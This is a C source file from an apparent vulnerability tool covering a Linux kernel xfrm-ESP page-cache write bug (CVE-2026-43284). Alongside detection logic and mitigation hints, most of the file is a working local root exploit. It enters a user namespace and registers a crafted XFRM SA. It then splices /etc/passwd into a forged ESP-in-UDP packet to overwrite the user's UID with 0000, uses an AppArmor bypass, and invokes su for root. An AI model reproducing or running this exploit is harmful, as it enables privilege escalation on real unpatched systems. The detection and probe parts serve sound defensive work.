Files
SKELETONKEY/modules/copy_fail_family/dirtyfrag_esp.c
T

805 lines
30 KiB
C

/*
* DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant
* CVE-2026-43284
*
* BACKGROUND
* ----------
* In Linux, esp_input() runs the AEAD decryption in-place on the
* incoming skb. Before that, an skb whose payload sits in a frag (i.e.
* not in the linear head — the case that arises when userspace plants
* a page via splice()) is supposed to be cloned out into kernel-owned
* memory by skb_cow_data(). The bug:
*
* if (!skb_cloned(skb)) {
* if (!skb_is_nonlinear(skb)) {
* nfrags = 1;
* goto skip_cow;
* } else if (!skb_has_frag_list(skb)) {
* nfrags = skb_shinfo(skb)->nr_frags;
* nfrags++;
* goto skip_cow; // <-- vulnerable branch
* }
* }
*
* If the skb has frags but no frag_list, esp_input skips the COW and
* runs in-place AEAD on the user-supplied page. The same authencesn
* scratch-write that powers Copy Fail then lands at file offset
* (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
* `seq_hi` from the SA's replay_esn state, which userspace controls
* via XFRMA_REPLAY_ESN_VAL on SA registration.
*
* Net result: same 4-byte arbitrary-offset write into a page-cache
* page as Copy Fail, but reachable via the xfrm path *even when
* algif_aead is blacklisted as a Copy Fail mitigation*.
*
* COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
* must enter a fresh user namespace first. This is allowed by default
* on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
*
* DETECTION STRATEGY
* ------------------
* Precondition-based: we report VULNERABLE when *all* of these hold:
* - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
* - esp4 module loadable (we don't insmod; rely on autoload)
* - unprivileged user namespace creation works
*
* Avoiding the actual primitive in detect mode keeps the system
* undisturbed (no namespaces created in the parent, no encap sockets,
* no transient SAs). The exploit path runs the full primitive for real.
*
* EXPLOIT STRATEGY
* ----------------
* Same UID-flip as Copy Fail, but driven through xfrm:
*
* 1. fork() — parent stays in init userns to call su afterwards
* 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
* 3. child: write deny → /proc/self/setgroups
* 4. child: write "0 <real_uid> 1" → /proc/self/uid_map (and gid_map)
* 5. child: ioctl SIOCSIFFLAGS to bring lo UP
* 6. child: open NETLINK_XFRM, register SA with:
* proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
* alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
* encap=ESPINUDP sport=dport=4500,
* replay_esn.seq_hi = "0000" (the 4 bytes that will land)
* 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
* and udp_send connected to 127.0.0.1:4500
* 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) →
* splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send
* 9. child: recvmsg drives the kernel through the esp_input path,
* firing the 4-byte STORE of "0000" into /etc/passwd
* at the user's UID offset
* 10. child: exits, parent verifies via fresh open of /etc/passwd
* 11. parent: execlp("su", username) — PAM checks /etc/shadow on
* disk (untouched), gets right password, setuid(0) lands
* us at root because the page-cache copy of /etc/passwd
* now lists us as UID 0.
*/
#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
* conflicts with <netinet/udp.h> over `struct udphdr` and we don't
* actually need the struct. The kernel constants are stable, so we
* just hard-code them as fallbacks (the #ifndef makes this a no-op if
* the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET 0x40000000
#define IFF_UP 0x01
#define IFF_RUNNING 0x40
#define SIOCSIFFLAGS 0x8914
struct sockaddr_in { int dummy; };
struct ifreq { int dummy; };
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
__attribute__((unused))
static int ioctl (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE10
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
/*
 * Precondition-based detection for the xfrm-ESP variant.
 *
 * Read-only unless the operator opted into --active probing: inspects the
 * kernel version, whether esp4/esp6 are loaded, whether unprivileged user
 * namespaces can be created, and whether AppArmor strips capabilities
 * inside such a namespace.
 *
 * Returns:
 *   DF_PRECOND_FAIL  - unprivileged userns is denied, or the LSM policy
 *                      blocks CAP_NET_ADMIN inside it.
 *   DF_VULNERABLE    - all reachability preconditions hold. This is NOT
 *                      proof the kernel is unpatched; distro backports of
 *                      the fix cannot be detected from here.
 *   (with --active)  - whatever conclusive verdict the active probe gives
 *                      (DF_VULNERABLE / DF_OK / DF_PRECOND_FAIL).
 *
 * The kernel version is advisory only. A version older than the mainline
 * release that introduced the vulnerable branch does not downgrade the
 * verdict (vendor kernels may carry the change as a backport), but the
 * final message no longer claims the kernel is "within affected window"
 * in that case.
 */
df_result_t dirtyfrag_esp_detect(void)
{
    log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");

    int km = -1, kn = -1;
    bool have_version = kernel_version(&km, &kn);
    if (have_version)
        log_hint("kernel %d.%d.x", km, kn);

    /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and
     * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily
     * tell whether a particular distro kernel has the backport, so we
     * report based on prereq presence and let the operator decide.
     * What we CAN tell is when the reported version is older than the
     * 4.10 introduction point documented in this file's header. */
    bool predates_bug = have_version && (km < 4 || (km == 4 && kn < 10));

    /* esp4 / esp6 autoload on first XFRM SA registration, so "not loaded"
     * is not a negative signal; "loaded" is a strong positive one. */
    bool esp4 = kmod_loaded("esp4");
    bool esp6 = kmod_loaded("esp6");
    log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no");
    log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");

    bool userns = unprivileged_userns_allowed();
    log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
    if (!userns) {
        log_ok("xfrm-ESP variant unreachable without unprivileged userns");
        log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
                 "variant of Dirty Frag may still be reachable. Run with "
                 "--check-rxrpc.");
        return DF_PRECOND_FAIL;
    }

    if (!esp4 && !esp6) {
        log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
                 "on first SA registration. We treat this as still vulnerable.");
    }

    /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the
     * userns — the kernel may still have the bug but unprivileged users
     * can't reach it. Report that honestly rather than claiming
     * VULNERABLE. */
    if (apparmor_userns_caps_blocked()) {
        log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
               "policy denies CAP_NET_ADMIN inside any unprivileged userns.");
        log_hint("unprivileged exploitation is blocked; real root can still "
                 "reach the kernel bug. Apply the kernel patch as soon as your "
                 "distro ships it.");
        return DF_PRECOND_FAIL;
    }

    if (dirtyfail_active_probes) {
        log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
        df_result_t pr = dirtyfrag_esp_active_probe();
        /* Only conclusive verdicts short-circuit; anything else falls
         * through to the precondition-based verdict below. */
        if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL)
            return pr;
        log_warn("active probe inconclusive — falling back to precondition verdict");
    }

    if (predates_bug) {
        /* Stay conservative on the return value, but do not assert an
         * affected-window match we have evidence against. */
        log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
                 "available, but kernel %d.%d predates the mainline release (4.10) "
                 "that introduced the affected code; likely a false positive "
                 "unless your vendor backported cac2661c53f3", km, kn);
    } else {
        log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
                 "available, kernel within affected window");
    }
    log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
    log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
             "esp4/esp6 in /etc/modprobe.d/");
    log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
    return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* Exploit — only compiled with full bodies on Linux.
* ---------------------------------------------------------------- */
#ifdef __linux__
/* Write a small string to a /proc file. */
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t want = strlen(value);
ssize_t got = write(fd, value, want);
close(fd);
return got == want;
}
/* ---- Netlink XFRM SA registration --------------------------------- *
*
* The XFRM SA registration is built by hand. Each attribute is a 4-byte
* aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
* payload. The total nlmsg length is filled in last.
*
* Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
*/
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* Selector: src/dst 127.0.0.1, IPv4 */
usa->sel.daddr.a4 = htonl(0x7f000001);
usa->sel.saddr.a4 = htonl(0x7f000001);
usa->sel.family = AF_INET;
usa->sel.prefixlen_d = 32;
usa->sel.prefixlen_s = 32;
usa->id.daddr.a4 = htonl(0x7f000001);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
usa->saddr.a4 = htonl(0x7f000001);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET;
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* The kernel's xfrm code does NOT accept `authencesn(...)` as a
* single XFRMA_ALG_AEAD attribute — it's a composition that has
* to be assembled from separate auth + crypt parts. We register:
* XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
* XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key
*
* The kernel internally wires these into authencesn(hmac(sha256),
* cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8; /* bits */
aa->alg_trunc_len = 128; /* bits — truncated MAC width */
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
{
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->oseq = 0;
esn->seq = 100;
esn->oseq_hi = 0;
memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
{
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
enc->encap_oa.a4 = 0;
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
/* Drain ACK */
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
return false;
}
}
return true;
}
/* Bring loopback up inside the new netns. */
static bool bring_lo_up(void)
{
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
* is a page-cache page from `target_path`, planted via splice at
* `splice_off`. The kernel STORE lands ~14 bytes into the spliced
* region (the v4 path has no V6_STORE_SHIFT-style offset). */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
/* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
* incoming UDP frames are rerouted into xfrm_input -> esp_input. */
int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(0x7f000001),
};
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
close(udp_recv); return false;
}
/* udp_send: connect to udp_recv. Packets we splice here will arrive
* at udp_recv via loopback and feed xfrm_input. */
int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
* IV value doesn't matter — auth check fails after the STORE. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */
memset(wire_hdr + 8, 0xCC, 16);
/* Open the target file for splicing. */
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* vmsplice the wire header into the pipe (24 bytes). */
struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice header: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice 16 bytes of target's page cache from splice_off. */
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice the whole 40-byte payload from pipe to udp_send. */
if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
log_bad("splice pipe->udp: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
close(p[0]); close(p[1]);
/* Drive the receive — esp_input runs inline here, performs the
* scratch-write, and we don't really care about the actual recv
* data (auth will fail with EBADMSG).
*
* The usleep gives the kernel a hard guarantee that the in-place
* decrypt has finished and the page-cache STORE is visible before
* we tear down the sockets. On a busy or slow VM, splice() can
* return before esp_input has actually fired. V4bel's reference
* exploit uses the same 150ms wait. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd);
close(udp_recv);
close(udp_send);
return true;
}
/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
return trigger_store_at("/etc/passwd", passwd_off);
}
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare: %s", strerror(errno));
return 1;
}
if (!write_proc("/proc/self/setgroups", "deny")) {
log_bad("setgroups deny: %s", strerror(errno));
return 1;
}
char map[64];
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
if (!write_proc("/proc/self/uid_map", map)) {
log_bad("uid_map: %s", strerror(errno));
return 1;
}
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
if (!write_proc("/proc/self/gid_map", map)) {
log_bad("gid_map: %s", strerror(errno));
return 1;
}
if (!bring_lo_up()) {
log_bad("bring lo up: %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("AF_NETLINK XFRM: %s", strerror(errno));
return 1;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(passwd_off)) {
log_bad("trigger failed");
close(nl); return 1;
}
log_ok("ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else /* __linux__ */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
(void)passwd_off; (void)real_uid; (void)real_gid;
return 1;
}
#endif
/* ---------------------------------------------------------------- *
* INNER — runs in the AA bypass userns (post-stage 2).
*
* No user interaction, no fork, no verify, no su. Just the kernel
* work: open netlink, register SA, fire splice trigger, exit.
* The parent (init ns) owns everything else.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl);
return DF_EXPLOIT_FAIL;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(uid_off)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
(long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
return DF_TEST_ERROR;
#endif
}
/* ---------------------------------------------------------------- *
* OUTER — runs in init namespace.
*
* Prompts the operator, sets env vars, fork → child arms AA bypass
* and runs the inner. Parent stays in init ns, waits, reads the
* global page cache to verify, then either:
* - do_shell=true: execlp("su", user) — runs in init ns →
* PAM reads modified /etc/passwd → uid 0 → real init-ns root
* - do_shell=false: try_revert_passwd_page_cache, return.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
log_step("Dirty Frag (xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
"and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
"page from offset %lld", (long long)uid_off);
log_warn("on success the page cache will report '%s' as UID 0", user);
log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
/* Hand off to the inner via env vars + AA bypass fork.
*
* The child fork enters the bypass userns, runs
* dirtyfrag_esp_exploit_inner (dispatched from main() based on
* DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
* We (parent, init ns) read the result via the same global page
* cache and execlp(su) here in init ns for REAL root. */
setenv("DIRTYFAIL_INNER_MODE", "esp", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init namespace — page cache is global, so we see the
* child's modification here. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe — used by `--scan --active`.
*
* Same userns + XFRM SA + splice-trigger setup as the exploit, but
* targets a sentinel file in /tmp instead of /etc/passwd. The parent
* (init ns) reads the sentinel after the child returns and looks for
* the marker bytes.
*
* If the marker landed → kernel STORE is reachable → DF_VULNERABLE.
* If the page is intact → kernel is patched → DF_OK.
* If AA blocks the bypass → DF_PRECOND_FAIL.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("active-probe: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!bring_lo_up()) {
log_bad("active-probe: bring lo up: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
if (!trigger_store_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp_active_probe(void)
{
/* Sentinel file: 4 KiB of 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
/* Re-read sentinel and search for marker. */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
return DF_OK;
}